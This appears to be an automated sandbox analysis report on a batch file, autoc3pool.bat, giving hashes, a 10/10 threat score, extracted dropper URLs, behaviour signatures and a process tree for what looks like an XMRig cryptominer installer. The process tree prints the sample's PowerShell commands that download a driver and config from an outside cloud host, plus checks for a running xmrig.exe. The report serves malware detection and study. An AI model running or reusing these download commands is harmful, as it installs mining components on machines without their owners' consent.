Overview

overview

10

Static

static

1

autoc3pool.bat

windows10-1703-x64

10

Analysis

  • max time kernel
    1s
  • max time network
    157s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-en
  • resource tags

    arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
  • submitted
    02-01-2024 09:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    autoc3pool.bat

  • Size

    5KB

  • MD5

    d28070074dab9fa5aceddb39ca45dc5d

  • SHA1

    e268ed454e42a4286fbef29a41a368f3183c6a3e

  • SHA256

    7a5c1b3504f8b7cc3807b63489be9f3c5629600f507f7ba2073ccf9cb93aa4d8

  • SHA512

    b1f941a0af376483bea4c48e1ae6e7fac055d83873974de83f704dfabade5749d43082f013dd41eb1fab5b6cdc3ff483b52e6c93757925e82532e44d0883062f

  • SSDEEP

    96:EAcjtsHKVDoHJyH+vHEdXGWcL+mKMVFLQqIr0yJ43T+Q3oUIg1RWS2QvSJFcHbTO:EVaqpopyevkhP6+mKoQfgO43V3odg1R+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json

Signatures

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\autoc3pool.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4924
    • C:\Windows\system32\find.exe
      find /i "xmrig.exe"
      2⤵
        PID:4568
      • C:\Windows\system32\tasklist.exe
        tasklist /fi "imagename eq xmrig.exe"
        2⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:4844
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys', '9924\WinRing0x64.sys')"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5052
      • C:\Windows\system32\net.exe
        net session
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4612
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json', '9924\config.json')"
        2⤵
          PID:2524
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        1⤵
          PID:664

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2524-50-0x00007FF8D6DD0000-0x00007FF8D77BC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2524-75-0x00007FF8D6DD0000-0x00007FF8D77BC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2524-70-0x0000023DE95F0000-0x0000023DE9600000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2524-51-0x0000023DE95F0000-0x0000023DE9600000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2524-53-0x0000023DE95F0000-0x0000023DE9600000-memory.dmp

          Filesize

          64KB

          Download

        • memory/5052-7-0x00007FF8D6DD0000-0x00007FF8D77BC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/5052-26-0x00007FF8D6DD0000-0x00007FF8D77BC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/5052-27-0x00000181F7310000-0x00000181F7320000-memory.dmp

          Filesize

          64KB

          Download

        • memory/5052-28-0x00000181F7310000-0x00000181F7320000-memory.dmp

          Filesize

          64KB

          Download

        • memory/5052-45-0x00000181F7310000-0x00000181F7320000-memory.dmp

          Filesize

          64KB

          Download

        • memory/5052-46-0x00007FF8D6DD0000-0x00007FF8D77BC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/5052-25-0x00000181F7310000-0x00000181F7320000-memory.dmp

          Filesize

          64KB

          Download

        • memory/5052-4-0x00000181DF050000-0x00000181DF072000-memory.dmp

          Filesize

          136KB

          Download

        • memory/5052-8-0x00000181F7310000-0x00000181F7320000-memory.dmp

          Filesize

          64KB

          Download

        • memory/5052-9-0x00000181F74A0000-0x00000181F7516000-memory.dmp

          Filesize

          472KB

          Download

        • memory/5052-10-0x00000181F7310000-0x00000181F7320000-memory.dmp

          Filesize

          64KB

          Download